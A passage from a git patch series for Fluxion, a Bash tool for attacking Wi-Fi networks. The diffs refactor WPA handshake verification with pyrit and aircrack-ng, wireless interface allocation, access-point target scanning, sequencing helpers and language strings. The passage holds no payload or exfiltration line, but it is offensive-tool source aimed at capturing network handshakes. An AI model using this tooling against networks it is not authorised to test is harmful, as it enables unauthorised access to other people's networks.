$handshakeAPMAC" > $HashOutputDevice - echo "Verifier Parameters: $handshakeVerifier, path $handshakePath, SSID \"$handshakeAPSSID\", MAC $handshakeAPMAC" >$HashOutputDevice + local analysis # Since it's being used in all relevant instances. case "$handshakeVerifier" in - "pyrit") - readarray analysis < <(pyrit -r "$handshakePath" analyze 2>$HashOutputDevice) - if [ "${#analysis[@]}" -eq 0 -o $? != 0 ]; then - echo "Error: pyrit seems to be broken!" >$HashOutputDevice + "pyrit") + readarray analysis < <(pyrit -r "$handshakePath" analyze 2> $HashOutputDevice) + if [ "${#analysis[@]}" -eq 0 -o $? != 0 ]; then + echo "Error: pyrit seems to be broken!" > $HashOutputDevice + return 1 + fi + + local hashMeta=$(echo "${analysis[@]}" | grep -F "AccessPoint ${handshakeAPMAC,,} ('$handshakeAPSSID')") + + if [ "$hashMeta" ]; then + local hashID=$(echo "$hashMeta" | awk -F'[ #:]' '{print $3}') + local hashData=$(echo "${analysis[@]}" | awk "\$0~/#$hashID: HMAC_SHA[0-9]+_AES/{ print \$0 }") + else + echo "No valid hash meta was found for \"$handshakeAPSSID\"" > $HashOutputDevice + fi + ;; + "aircrack-ng") + readarray analysis < <(aircrack-ng "$handshakePath" 2> $HashOutputDevice) + if [ "${#analysis[@]}" -eq 0 -o $? != 0 ]; then + echo "Error: aircrack-ng seems to be broken!" > $HashOutputDevice + return 1 + fi + + local hashData=$(echo "${analysis[@]}" | grep -E "${handshakeAPMAC^^}\s+" | grep -F "$handshakeAPSSID") + ;; + *) + echo "Invalid verifier, quitting!" > $HashOutputDevice return 1 - fi - - local hashMeta=$(echo "${analysis[@]}" | grep -F "AccessPoint ${handshakeAPMAC,,} ('$handshakeAPSSID')") - - if [ "$hashMeta" ]; then - local hashID=$(echo "$hashMeta" | awk -F'[ #:]' '{print $3}') - hashData=$(echo "${analysis[@]}" | awk "\$0~/#$hashID: HMAC_SHA[0-9]+_AES/{ print \$0 }") - else - echo "No valid hash meta was found for \"$handshakeAPSSID\"" >$HashOutputDevice - fi - ;; - "aircrack-ng") - readarray analysis < <(aircrack-ng "$handshakePath" 2>$HashOutputDevice) - if [ "${#analysis[@]}" -eq 0 -o $? != 0 ]; then - echo "Error: aircrack-ng seems to be broken!" >$HashOutputDevice - return 1 - fi - - hashData=$(echo "${analysis[@]}" | grep -E "${handshakeAPMAC^^}\s+" | grep -F "$handshakeAPSSID") - ;; - *) - echo "Invalid verifier, quitting!" - return 1 - ;; + ;; esac if [ -z "$hashData" ]; then @@ -53,18 +52,24 @@ function hash_check_handshake() { return 1 fi - local hashResult case "$handshakeVerifier" in - "pyrit") hashResult=$(echo "$hashData" | grep "good") ;; - "aircrack-ng") hashResult=$(echo "$hashData" | grep "(1 handshake)") ;; + "pyrit") + if echo "$hashData" | grep -qF "good"; then + local -r hashResult=1 + fi ;; + + "aircrack-ng") + if echo "$hashData" | grep -qE "\([0-9]+ handshake\)"; then + local -r hashResult=1 + fi ;; esac if [ -z "$hashResult" ]; then - echo "Invalid hash for $handshakeAPSSID ($handshakeAPMAC)!" + echo "Invalid hash for $handshakeAPSSID ($handshakeAPMAC)!" > $HashOutputDevice HASHCheckHandshake="invalid" return 1 else - echo "Valid hash for $handshakeAPSSID ($handshakeAPMAC)!" + echo "Valid hash for $handshakeAPSSID ($handshakeAPMAC)!" > $HashOutputDevice HASHCheckHandshake="valid" fi } From 2aefa3bb223bbfd8a334dd433384c908daac2913 Mon Sep 17 00:00:00 2001 From: Matias Barcenas Date: Mon, 8 Jan 2018 22:56:44 -0600 Subject: [PATCH 04/45] Mangling, interfaces, format, renaming, & fixes. Added identifier mangling to sequencing framework to prevent collisions. Added the redo to interfaces by taking a lambda rather than an array ref. Started correcting some issues with formatting to follow the style guide. Reidentified some subroutines, variables, & constants. Fixed some bugs with the currently implemented subroutines. Added some test subroutines. --- fluxion | 277 +++++++++++++++++++++++++++++++------------------ language/en.sh | 6 +- 2 files changed, 180 insertions(+), 103 deletions(-) diff --git a/fluxion b/fluxion index 5efebbe..c426ca6 100755 --- a/fluxion +++ b/fluxion @@ -76,7 +76,7 @@ source lib/HashUtils.sh # ============================================================ # # =================== < Parse Parameters > =================== # # ============================================================ # -if ! FLUXIONCLIArguments=$(getopt --options="vdkrntl:a:" --longoptions="debug,version,killer,reloader,airmon-ng,target,language:,attack:" --name="FLUXION V$FLUXIONVersion.$FLUXIONRevision" -- "$@") +if ! FLUXIONCLIArguments=$(getopt --options="vdkrntl:a:" --longoptions="debug,version,killer,reloader,airmon-ng,target,test,language:,attack:" --name="FLUXION V$FLUXIONVersion.$FLUXIONRevision" -- "$@") then echo -e "${CRed}Aborted$CClr, parameter error detected..."; exit 5 fi @@ -427,31 +427,34 @@ declare -rA FLUXIONUndoable=( \ ["start"]="stop" \ ) +# Yes, I know, the identifiers are fucking ugly. If only we had +# some type of mangling with bash identifiers, that'd be great. function fluxion_do() { if [ ${#@} -lt 2 ]; then return -1; fi - local -r namespace=$1 - local -r identifier=$2 + local -r __fluxion_do__namespace=$1 + local -r __fluxion_do__identifier=$2 - eval FXDLog_$namespace+=\("$identifier"\) - eval ${namespace}_$identifier "${@:3}" + eval FXDLog_$__fluxion_do__namespace+=\("$__fluxion_do__identifier"\) + eval ${__fluxion_do__namespace}_$__fluxion_do__identifier "${@:3}" return $? } function fluxion_undo() { if [ ${#@} -ne 1 ]; then return -1; fi - local -r namespace=$1 + local -r __fluxion_undo__namespace=$1 - eval local -r history=\("\${FXDLog_$namespace[@]}"\) + eval local -r __fluxion_undo__history=\("\${FXDLog_$__fluxion_undo__namespace[@]}"\) - local i - for (( i=${#history[@]}; i > 0; i-- )); do - local -r instruction=${history[i-1]} - local -r command=${instruction%%_*} - local -r identifier=${instruction#*_} - if eval ${namespace}_${FLUXIONUndoable["$command"]}_$identifier; then - eval FXDLog_$namespace=\("${history[@]::$i}"\) + local __fluxion_undo__i + for (( __fluxion_undo__i=${#__fluxion_undo__history[@]}; \ + __fluxion_undo__i > 0; __fluxion_undo__i-- )); do + local -r __fluxion_undo__instruction=${__fluxion_undo__history[__fluxion_undo__i-1]} + local -r __fluxion_undo__command=${__fluxion_undo__instruction%%_*} + local -r __fluxion_undo__identifier=${__fluxion_undo__instruction#*_} + if eval ${__fluxion_undo__namespace}_${FLUXIONUndoable["$__fluxion_undo__command"]}_$__fluxion_undo__identifier; then + eval FXDLog_$__fluxion_undo__namespace=\("${__fluxion_undo__history[@]::$__fluxion_undo__i}"\) return 0 fi done @@ -460,14 +463,20 @@ function fluxion_undo() { } function fluxion_done() { - eval "FluxionDone=\${FXDLog_$namespace[-1]}" + if [ ${#@} -ne 1 ]; then return -1; fi + + local -r __fluxion_done__namespace=$1 + + eval "FluxionDone=\${FXDLog_$__fluxion_done__namespace[-1]}" [ ! $FluxionDone ] && return 1 } function fluxion_done_reset() { if [ ${#@} -ne 1 ]; then return -1; fi - local -r namespace=$1 - eval FXDLog_$namespace=\(\) + + local -r __fluxion_done_reset__namespace=$1 + + eval FXDLog_$__fluxion_done_reset__namespace=\(\) } function fluxion_do_sequence() { @@ -745,71 +754,80 @@ function fluxion_allocate_interface() { # Reserve interfaces # as the key for the global FluxionInterfaces hash/map/dictionary. } +# Parameters: +# Note: The interfaces lambda must print an interface per line. +# ------------------------------------------------------------ # +# Return -1: Go back +# Return 1: Missing interfaces lambda identifier (not passed). function fluxion_get_interface() { - if [[ "$1" != *"[@]" ]]; then return 1; fi + if ! type -t "$1" &> /dev/null; then return 1; fi - local interfacesAvailable=("${!1}") - local interfacesAvailableInfo=() - local interfacesAvailableColor=() - local interfacesAvailableState=() + while true; do + local interfacesAvailable + readarray -t interfacesAvailable < <($1) + local interfacesAvailableInfo=() + local interfacesAvailableColor=() + local interfacesAvailableState=() - # Gather information from all available interfaces. - local interfaceCandidate - for interfaceCandidate in "${interfacesAvailable[@]}"; do - interface_chipset "$interfaceCandidate" - interfacesAvailableInfo+=("$InterfaceChipset") + # Gather information from all available interfaces. + local interfaceCandidate + for interfaceCandidate in "${interfacesAvailable[@]}"; do + interface_chipset "$interfaceCandidate" + interfacesAvailableInfo+=("$InterfaceChipset") - # If it has already been allocated, we can use it at will. - if [ ${FluxionInterfaces["$interfaceCandidate"]} ]; then - interfacesAvailableColor+=("$CGrn") - interfacesAvailableState+=("[*]") - else - interface_state "$interfaceCandidate" - - if [ "$InterfaceState" = "up" ]; then - interfacesAvailableColor+=("$CPrp") - interfacesAvailableState+=("[-]") + # If it has already been allocated, we can use it at will. + if [ ${FluxionInterfaces["$interfaceCandidate"]} ]; then + interfacesAvailableColor+=("$CGrn") + interfacesAvailableState+=("[*]") else - interfacesAvailableColor+=("$CClr") - interfacesAvailableState+=("[+]") + interface_state "$interfaceCandidate" + + if [ "$InterfaceState" = "up" ]; then + interfacesAvailableColor+=("$CPrp") + interfacesAvailableState+=("[-]") + else + interfacesAvailableColor+=("$CClr") + interfacesAvailableState+=("[+]") + fi fi + done + + # If only one interface exists and it's not unavailable, choose it. + if [ "${#interfacesAvailable[@]}" -eq 1 -a \ + "${interfacesAvailableState[0]}" != "[-]" ]; then + FluxionGetInterfaceSelected="${interfacesAvailable[0]}" + FluxionGetInterfaceSelectedState="${interfacesAvailableState[0]}" + FluxionGetInterfaceSelectedInfo="${interfacesAvailableInfo[0]}" + else + interfacesAvailable+=( \ + "$FLUXIONGeneralRepeatOption" \ + "$FLUXIONGeneralBackOption" \ + ) + + interfacesAvailableColor+=( \ + "$CClr" \ + "$CClr" \ + ) + + format_apply_autosize "$CRed[$CSYel%1d$CClr$CRed]%b %-8b %3s$CClr %-*.*s\n" + io_query_format_fields \ + "$FLUXIONVLine $FLUXIONInterfaceQuery" "$FormatApplyAutosize" \ + interfacesAvailableColor[@] interfacesAvailable[@] \ + interfacesAvailableState[@] interfacesAvailableInfo[@] + + echo + + case "${IOQueryFormatFields[1]}" in + "$FLUXIONGeneralRepeatOption") continue;; + "$FLUXIONGeneralBackOption") return -1;; + *) break;; + esac fi done - # If only one interface exists and it's not unavailable, choose it. - if [ "${#interfacesAvailable[@]}" -eq 1 -a \ - "${interfacesAvailableState[0]}" != "[-]" ]; then - FluxionGetInterfaceSelected="${interfacesAvailable[0]}" - FluxionGetInterfaceSelectedState="${interfacesAvailableState[0]}" - FluxionGetInterfaceSelectedInfo="${interfacesAvailableInfo[0]}" - else - interfacesAvailable+=( \ - "$FLUXIONGeneralRepeatOption" \ - "$FLUXIONGeneralBackOption" \ - ) - - interfacesAvailableColor+=( \ - "$CClr" \ - "$CClr" \ - ) - - format_apply_autosize "$CRed[$CSYel%1d$CClr$CRed]%b %-8b %3s$CClr %-*.*s\n" - io_query_format_fields \ - "$FLUXIONVLine $FLUXIONInterfaceQuery" "$FormatApplyAutosize" \ - interfacesAvailableColor[@] interfacesAvailable[@] \ - interfacesAvailableState[@] interfacesAvailableInfo[@] - - echo - - case "${IOQueryFormatFields[1]}" in - "$FLUXIONGeneralRepeatOption") return -2;; - "$FLUXIONGeneralBackOption") return -1;; - esac - - FluxionGetInterfaceSelected="${IOQueryFormatFields[1]}" - FluxionGetInterfaceSelectedState="${IOQueryFormatFields[2]}" - FluxionGetInterfaceSelectedInfo="${IOQueryFormatFields[3]}" - fi + FluxionInterfaceSelected="${IOQueryFormatFields[1]}" + FluxionInterfaceSelectedState="${IOQueryFormatFields[2]}" + FluxionInterfaceSelectedInfo="${IOQueryFormatFields[3]}" } @@ -820,7 +838,7 @@ function fluxion_get_interface() { # Return 2: Xterm failed to start airmon-ng. # Return 3: Invalid capture file was generated. # Return 4: No candidates were detected. -function fluxion_get_target_candidates() { +function fluxion_target_get_candidates() { # Assure a valid wireless interface for scanning was given. if [ ! "$1" ] || ! interface_is_wireless "$1"; then return 1; fi @@ -855,13 +873,13 @@ function fluxion_get_target_candidates() { # The times matching operator "{n}" isn't supported by mawk (alias awk). # readarray FLUXIONTargetCandidates < <(gawk -F, 'NF==15 && $1~/([A-F0-9]{2}:){5}[A-F0-9]{2}/ {print $0}' $FLUXIONWorkspacePath/dump-01.csv) # readarray FLUXIONTargetCandidatesClients < <(gawk -F, 'NF==7 && $1~/([A-F0-9]{2}:){5}[A-F0-9]{2}/ {print $0}' $FLUXIONWorkspacePath/dump-01.csv) - readarray FLUXIONTargetCandidates < <(awk -F, 'NF==15 && length($1)==17 && $1~/([A-F0-9][A-F0-9]:)+[A-F0-9][A-F0-9]/ {print $0}' "$FLUXIONWorkspacePath/dump-01.csv") - readarray FLUXIONTargetCandidatesClients < <(awk -F, 'NF==7 && length($1)==17 && $1~/([A-F0-9][A-F0-9]:)+[A-F0-9][A-F0-9]/ {print $0}' "$FLUXIONWorkspacePath/dump-01.csv") + readarray FluxionTargetCandidates < <(awk -F, 'NF==15 && length($1)==17 && $1~/([A-F0-9][A-F0-9]:)+[A-F0-9][A-F0-9]/ {print $0}' "$FLUXIONWorkspacePath/dump-01.csv") + readarray FluxionTargetCandidatesClients < <(awk -F, 'NF==7 && length($1)==17 && $1~/([A-F0-9][A-F0-9]:)+[A-F0-9][A-F0-9]/ {print $0}' "$FLUXIONWorkspacePath/dump-01.csv") # Cleanup the workspace to prevent potential bugs/conflicts. sandbox_remove_workfile "$FLUXIONWorkspacePath/dump*" - if [ ${#FLUXIONTargetCandidates[@]} -eq 0 ]; then + if [ ${#FluxionTargetCandidates[@]} -eq 0 ]; then echo -e "$FLUXIONVLine $FLUXIONScannerDetectedNothingNotice" sleep 3 return 4 @@ -873,6 +891,8 @@ function fluxion_get_target() { # Assure a valid wireless interface for scanning was given. if [ ! "$1" ] || ! interface_is_wireless "$1"; then return 1; fi + local -r interface=$1 + local choices=( \ "$FLUXIONScannerChannelOptionAll (2.4GHz)" \ "$FLUXIONScannerChannelOptionAll (5GHz)" \ @@ -886,13 +906,13 @@ function fluxion_get_target() { case "$IOQueryChoice" in "$FLUXIONScannerChannelOptionAll (2.4GHz)") - fluxion_get_target_candidates $interface "" "bg";; + fluxion_target_get_candidates $interface "" "bg";; "$FLUXIONScannerChannelOptionAll (5GHz)") - fluxion_get_target_candidates $interface "" "a";; + fluxion_target_get_candidates $interface "" "a";; "$FLUXIONScannerChannelOptionAll (2.4GHz & 5Ghz)") - fluxion_get_target_candidates $interface "" "abg";; + fluxion_target_get_candidates $interface "" "abg";; "$FLUXIONScannerChannelOptionSpecific") fluxion_header @@ -910,7 +930,7 @@ function fluxion_get_target() { echo - fluxion_get_target_candidates $interface $channels;; + fluxion_target_get_candidates $interface $channels;; "$FLUXIONGeneralBackOption") return -1;; @@ -931,22 +951,29 @@ function fluxion_get_target() { # Gather information from all the candidates detected. # TODO: Clean up this for loop using a cleaner algorithm. # Maybe try using array appending & [-1] for last elements. - for candidateAPInfo in "${candidates[@]}"; do + for candidateAPInfo in "${FluxionTargetCandidates[@]}"; do # Strip candidate info from any extraneous spaces after commas. candidateAPInfo=$(echo "$candidateAPInfo" | sed -r "s/,\s*/,/g") local i=${#candidatesMAC[@]} candidatesMAC[i]=$(echo "$candidateAPInfo" | cut -d , -f 1) - candidatesClientsCount[i]=$(echo "${candidatesClients[@]}" | grep -c "${candidatesMAC[i]}") + candidatesClientsCount[i]=$( + echo "${FluxionTargetCandidatesClients[@]}" | + grep -c "${candidatesMAC[i]}" + ) candidatesChannel[i]=$(echo "$candidateAPInfo" | cut -d , -f 4) candidatesSecurity[i]=$(echo "$candidateAPInfo" | cut -d , -f 6) candidatesPower[i]=$(echo "$candidateAPInfo" | cut -d , -f 9) - candidatesColor[i]=$([ ${candidatesClientsCount[i]} -gt 0 ] && echo $CGrn || echo $CClr) + candidatesColor[i]=$( + [ ${candidatesClientsCount[i]} -gt 0 ] && echo $CGrn || echo $CClr + ) # Parse any non-ascii characters by letting bash handle them. # Just escape all single quotes in ESSID and let bash's $'...' handle it. - local sanitizedESSID=$(echo "${candidateAPInfo//\'/\\\'}" | cut -d , -f 14) + local sanitizedESSID=$( + echo "${candidateAPInfo//\'/\\\'}" | cut -d , -f 14 + ) candidatesESSID[i]=$(eval "echo \$'$sanitizedESSID'") local power=${candidatesPower[i]} @@ -983,15 +1010,17 @@ function fluxion_get_target() { echo - FLUXIONGetTargetMAC=${IOQueryFormatFields[7]} - FLUXIONGetTargetSSID=${IOQueryFormatFields[1]} - FLUXIONGetTargetChannel=${IOQueryFormatFields[5]} + FluxionTargetMAC=${IOQueryFormatFields[7]} + FluxionTargetSSID=${IOQueryFormatFields[1]} + FluxionTargetChannel=${IOQueryFormatFields[5]} - FLUXIONGetTargetEncryption=${IOQueryFormatFields[6]} + FluxionTargetEncryption=${IOQueryFormatFields[6]} - FLUXIONGetTargetMakerID=${APTargetMAC:0:8} - FLUXIONGetTargetMaker=$( - macchanger -l | grep ${FLUXIONGetTargetMakerID,,} | cut -d ' ' -f 5- + FluxionTargetMakerID=${FluxionTargetMAC:0:8} + FluxionTargetMaker=$( + macchanger -l | + grep ${FluxionTargetMakerID,,} 2> $FLUXIONOutputDevice | + cut -d ' ' -f 5- ) # Sanitize network ESSID to make it safe for manipulation. @@ -1015,9 +1044,9 @@ function fluxion_target_show() { local colorlessFormat="$FormatApplyAutosize" local colorfullFormat=$(echo "$colorlessFormat" | sed -r 's/%-32s/%-32b/g') - printf "$colorlessFormat" "" "ESSID" "\"${FLUXIONGetTargetSSID:-[N/A]}\" / ${FLUXIONGetTargetEncryption:-[N/A]}" "" - printf "$colorlessFormat" "" "Channel" "${FLUXIONGetTargetChannel:-[N/A]}" "" - printf "$colorfullFormat" "" "BSSID" "${FLUXIONGetTargetMAC:-[N/A]} ($CYel${FLUXIONGetTargetMaker:-[N/A]}$CClr)" "" + printf "$colorlessFormat" "" "ESSID" "\"${FluxionTargetSSID:-[N/A]}\" / ${FluxionTargetEncryption:-[N/A]}" "" + printf "$colorlessFormat" "" "Channel" " ${FluxionTargetChannel:-[N/A]}" "" + printf "$colorfullFormat" "" "BSSID" " ${FluxionTargetMAC:-[N/A]} ($CYel${FluxionTargetMaker:-[N/A]}$CClr)" "" echo } @@ -1172,14 +1201,15 @@ function fluxion_hash_get() { # Assure we've got the bssid and the essid passed in. if [ ${#@} -lt 2 ]; then return 1; fi - if ! fluxion_hash_set_path "$1"; then return $?; fi + while true; do + if ! fluxion_hash_set_path "$1"; then return $?; fi - # TODO: People are gonna bitch about this, I can already tell: - # "The back button isn't taking me back!" So yeah, fix this. - if ! fluxion_hash_verify "$@"; then return $?; fi + if fluxion_hash_verify "$FluxionHashPath" "${@:1}"; then + break; + fi + done - # Copy to hash file to workspace for operations. - cp "$APTargetHashPath" "$hashPath" + # At this point FluxionHashPath will be set and ready. } @@ -1225,7 +1255,7 @@ function fluxion_set_attack() { echo if [ "${IOQueryFormatFields[1]}" = "$FLUXIONGeneralExitOption" ]; then - fluxion_shutdown + fluxion_shutdown; exit fi FluxionAttack=${IOQueryFormatFields[0]} @@ -1284,6 +1314,19 @@ function fluxion_run_attack() { } +# ============================================================ # +# =================== < Test Subroutines > =================== # +# ============================================================ # +function subtest1() { + local interface + interface_list_all + for interface in "${InterfaceListAll[@]}"; do + echo "$interface" + done +} + + + # ============================================================ # # ================= < Argument Executables > ================= # # ============================================================ # @@ -1292,6 +1335,36 @@ eval set -- "$FLUXIONCLIArguments" # Set environment parameters. while [ "$1" != "--" ]; do case "$1" in -t|--target) echo "Not yet implemented!"; sleep 3; fluxion_shutdown;; + --test) + while true; do + if ! fluxion_get_interface subtest1; then + echo Failed to get interface with code $? + exit + fi + + if ! fluxion_allocate_interface "$FluxionInterfaceSelected"; then + echo Failed to allocate "$FluxionInterfaceSelected" with code $? + exit + else + interfaceA=${FluxionInterfaces["$FluxionInterfaceSelected"]} + + echo "Allocated $FluxionInterfaceSelected -> $interfaceA" + fi + + fluxion_get_target $interfaceA + result=$? + if [ $result -ne 0 ]; then + echo Failed to get target with code $result + exit + fi + + if ! fluxion_target_show; then + echo Failed to show target with code $? + exit + fi + done + exit + ;; esac shift # Shift new parameters done diff --git a/language/en.sh b/language/en.sh index aa64840..a3e6c83 100755 --- a/language/en.sh +++ b/language/en.sh @@ -31,8 +31,10 @@ FLUXIONScannerDetectedNothingNotice="No access points were detected, returning.. FLUXIONHashFileDoesNotExistError="Hash file does not exist!" FLUXIONHashInvalidError="${CRed}Error$CClr, invalid hash file!" FLUXIONHashValidNotice="${CGrn}Success$CClr, hash verification completed!" -FLUXIONPathToHandshakeFileQuery="Enter path to handshake file $CClr(Example: /.../dump-01.cap)" +FLUXIONPathToHandshakeFileQuery="Enter path to handshake file $CClr(Example: /path/to/file.cap)" +FLUXIONPathToHandshakeFileReturnTip="To go back, leave the hash path blank." FLUXIONAbsolutePathInfo="Absolute path" +FLUXIONEmptyOrNonExistentHashError="${CRed}Error$CClr, path points to non-existing or empty hash file." # >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> FLUXIONScannerChannelQuery="Select a channel to monitor" FLUXIONScannerChannelOptionAll="All channels" @@ -52,6 +54,8 @@ FLUXIONHashSourcePathOption="Path to capture file" FLUXIONHashSourceRescanOption="Handshake directory (rescan)" FLUXIONFoundHashNotice="A hash for the target AP was found." FLUXIONUseFoundHashQuery="Do you want to use this file?" +FLUXIONUseFoundHashOption="Use hash" +FLUXIONSpecifyHashPathOption="Specify hash path" FLUXIONHashVerificationMethodQuery="Select a method of verification for the hash" FLUXIONHashVerificationMethodPyritOption="pyrit verification (${CGrn}recommended$CClr)" FLUXIONHashVerificationMethodAircrackOption="aircrack-ng verification (${CYel}unreliable$CClr)" From 98f3d2b7eaf7b331bb3071452440efd207ff26dc Mon Sep 17 00:00:00 2001 From: Matias Barcenas Date: Mon, 8 Jan 2018 23:50:10 -0600 Subject: [PATCH 05/45] Fixed allocated interface inconsistency bug. The bug caused the interface allocation subroutine to generate an error when attemping to allocate an interface that had already been allocated rather than gracefully returning, signifying the interface already exists in the allocation table. The interface selector subroutine wasn't masking already allocated interfaces, causing an issue when attemping to reallocate in series (back-to-back). --- fluxion | 56 +++++++++++++++++++++++++++++++++++--------------------- 1 file changed, 35 insertions(+), 21 deletions(-) diff --git a/fluxion b/fluxion index c426ca6..4dc8892 100755 --- a/fluxion +++ b/fluxion @@ -623,17 +623,25 @@ function fluxion_deallocate_interface() { # Release interfaces unset FluxionInterfaces[$newIdentifier] } +# Parameters: +# ------------------------------------------------------------ # +# Return 1: No interface identifier was passed. +# Return 2: Interface identifier given points to no interface. +# Return 3: Unable to determine interface's driver. +# Return 4: Fluxion failed to reidentify interface. +# Return 5: Interface allocation failed (identifier missing). function fluxion_allocate_interface() { # Reserve interfaces - if [ ! "$1" ] || ! interface_is_real $1; then return 1; fi + if [ ! "$1" ]; then return 1; fi local -r identifier=$1 - # If the interface is already in allocation table, return it. + # If the interface is already in allocation table, we're done. if [ "${FluxionInterfaces[$identifier]+x}" ]; then - FluxionInterface=${FluxionInterfaces[$identifier]} return 0 fi + if ! interface_is_real $identifier; then return 2; fi + echo -e "$FLUXIONVLine $FLUXIONAllocatingInterfaceNotice" if interface_is_wireless $identifier; then @@ -648,7 +656,7 @@ function fluxion_allocate_interface() { # Reserve interfaces if ! interface_driver "$identifier"; then echo -e "$FLUXIONVLine$CRed $FLUXIONUnknownWIDriverError" sleep 3 - return 2 + return 3 fi # Notice: This local is function-scoped, not block-scoped. @@ -706,7 +714,7 @@ function fluxion_allocate_interface() { # Reserve interfaces fi if [ $? -ne 0 ] # If reidentifying failed, abort immediately. - then return 3 + then return 4 fi fi @@ -740,7 +748,7 @@ function fluxion_allocate_interface() { # Reserve interfaces if [ ! "$newIdentifier" -o "$newIdentifier" = "$oldIdentifier" ]; then echo -e "$FLUXIONVLine $FLUXIONInterfaceAllocationFailedError" sleep 3 - return 4 + return 5 fi # Register identifiers to allocation hash table. @@ -770,13 +778,19 @@ function fluxion_get_interface() { local interfacesAvailableState=() # Gather information from all available interfaces. - local interfaceCandidate - for interfaceCandidate in "${interfacesAvailable[@]}"; do + local -r interfacesAvailableCount=${#interfacesAvailable[@]} + + local i + for (( i = 0; i < interfacesAvailableCount; i++ )); do + local interfaceCandidate=${interfacesAvailable[i]} + interface_chipset "$interfaceCandidate" interfacesAvailableInfo+=("$InterfaceChipset") # If it has already been allocated, we can use it at will. - if [ ${FluxionInterfaces["$interfaceCandidate"]} ]; then + local interfaceCandidateAlt=${FluxionInterfaces["$interfaceCandidate"]} + if [ "$interfaceCandidateAlt" ]; then + interfacesAvailable[$i]=$interfaceCandidateAlt interfacesAvailableColor+=("$CGrn") interfacesAvailableState+=("[*]") else @@ -1337,19 +1351,22 @@ while [ "$1" != "--" ]; do -t|--target) echo "Not yet implemented!"; sleep 3; fluxion_shutdown;; --test) while true; do - if ! fluxion_get_interface subtest1; then - echo Failed to get interface with code $? + fluxion_get_interface subtest1 + result=$? + if [ $result -ne 0 ]; then + echo Failed to get interface with code $result exit fi - if ! fluxion_allocate_interface "$FluxionInterfaceSelected"; then - echo Failed to allocate "$FluxionInterfaceSelected" with code $? + fluxion_allocate_interface "$FluxionInterfaceSelected" + result=$? + if [ $result -ne 0 ]; then + echo Failed to allocate "$FluxionInterfaceSelected" with code $result exit - else - interfaceA=${FluxionInterfaces["$FluxionInterfaceSelected"]} - - echo "Allocated $FluxionInterfaceSelected -> $interfaceA" fi + interfaceA=${FluxionInterfaces["$FluxionInterfaceSelected"]} + + echo "Allocated $FluxionInterfaceSelected -> $interfaceA" fluxion_get_target $interfaceA result=$? @@ -1358,10 +1375,7 @@ while [ "$1" != "--" ]; do exit fi - if ! fluxion_target_show; then - echo Failed to show target with code $? - exit - fi + fluxion_target_show done exit ;; From 792c362d26a9b2cddd03148200109ab6582355a3 Mon Sep 17 00:00:00 2001 From: Matias Barcenas Date: Tue, 9 Jan 2018 01:46:40 -0600 Subject: [PATCH 06/45] Tmux flag, preferences saving, & sequence addition. Added & started implementing the tmux flag, as an alternative to xterm. Added & started implementing redundant-preferences saving (language, ...). Added the language selection screen to fluxion's main sequence. Fixed minor bugs. --- fluxion | 78 ++++++++++++++++++++++++++++++++++++++------------------- 1 file changed, 52 insertions(+), 26 deletions(-) diff --git a/fluxion b/fluxion index 4dc8892..fa735df 100755 --- a/fluxion +++ b/fluxion @@ -33,6 +33,7 @@ if [ $EUID -ne 0 ] # Super User Check fi # ===================== < XTerm Checks > ===================== # +# TODO: Run the checks below only if we're not using tmux. if [ ! "${DISPLAY:-}" ] # Assure display is available. then echo -e "Aborted, X (graphical) session unavailable."; exit 2 fi @@ -76,7 +77,7 @@ source lib/HashUtils.sh # ============================================================ # # =================== < Parse Parameters > =================== # # ============================================================ # -if ! FLUXIONCLIArguments=$(getopt --options="vdkrntl:a:" --longoptions="debug,version,killer,reloader,airmon-ng,target,test,language:,attack:" --name="FLUXION V$FLUXIONVersion.$FLUXIONRevision" -- "$@") +if ! FLUXIONCLIArguments=$(getopt --options="vdkrnmtl:a:" --longoptions="debug,version,killer,reloader,airmon-ng,multiplexer,target,test,language:,attack:" --name="FLUXION V$FLUXIONVersion.$FLUXIONRevision" -- "$@") then echo -e "${CRed}Aborted$CClr, parameter error detected..."; exit 5 fi @@ -99,6 +100,7 @@ while [ "$1" != "--" ]; do -k|--killer) declare -r FLUXIONWIKillProcesses=1;; -r|--reloader) declare -r FLUXIONWIReloadDriver=1;; -n|--airmon-ng) declare -r FLUXIONAirmonNG=1;; + -m|--multiplexer) declare -r FLUXIONTMux=1;; -l|--language) FLUXIONLanguage=$2; shift;; -a|--attack) FLUXIONAttack=$2; shift;; esac @@ -110,9 +112,13 @@ shift # Remove "--" to prepare for attacks to read parameters. # =================== < User Preferences > =================== # # Load user-defined preferences if there's an executable script. +# If no script exists, prepare one for the user to store config. # WARNING: Preferences file must assure no redeclared constants. if [ -x "$FLUXIONPreferencesFile" ] then source "$FLUXIONPreferencesFile" +else + echo '#!/bin/bash' > "$FLUXIONPreferencesFile" + chmod u+x "$FLUXIONPreferencesFile" fi # ================ < Configurable Constants > ================ # @@ -450,10 +456,11 @@ function fluxion_undo() { local __fluxion_undo__i for (( __fluxion_undo__i=${#__fluxion_undo__history[@]}; \ __fluxion_undo__i > 0; __fluxion_undo__i-- )); do - local -r __fluxion_undo__instruction=${__fluxion_undo__history[__fluxion_undo__i-1]} - local -r __fluxion_undo__command=${__fluxion_undo__instruction%%_*} - local -r __fluxion_undo__identifier=${__fluxion_undo__instruction#*_} - if eval ${__fluxion_undo__namespace}_${FLUXIONUndoable["$__fluxion_undo__command"]}_$__fluxion_undo__identifier; then + local __fluxion_undo__instruction=${__fluxion_undo__history[__fluxion_undo__i-1]} + local __fluxion_undo__command=${__fluxion_undo__instruction%%_*} + local __fluxion_undo__identifier=${__fluxion_undo__instruction#*_} + + if ! eval ${__fluxion_undo__namespace}_${FLUXIONUndoable["$__fluxion_undo__command"]}_$__fluxion_undo__identifier; then eval FXDLog_$__fluxion_undo__namespace=\("${__fluxion_undo__history[@]::$__fluxion_undo__i}"\) return 0 fi @@ -468,7 +475,8 @@ function fluxion_done() { local -r __fluxion_done__namespace=$1 eval "FluxionDone=\${FXDLog_$__fluxion_done__namespace[-1]}" - [ ! $FluxionDone ] && return 1 + + if [ ! "$FluxionDone" ]; then return 1; fi } function fluxion_done_reset() { @@ -501,6 +509,7 @@ function fluxion_do_sequence() { __fluxion_do_sequence__index["${__fluxion_do_sequence__sequence[i-1]}"]=$i done + # Start sequence with the first instruction available. local __fluxion_do_sequence__instruction=${__fluxion_do_sequence__sequence[0]} while [ "$__fluxion_do_sequence__instruction" ]; do if ! fluxion_do $__fluxion_do_sequence__namespace $__fluxion_do_sequence__instruction; then @@ -509,7 +518,9 @@ function fluxion_do_sequence() { fi fi - if ! fluxion_done; then return 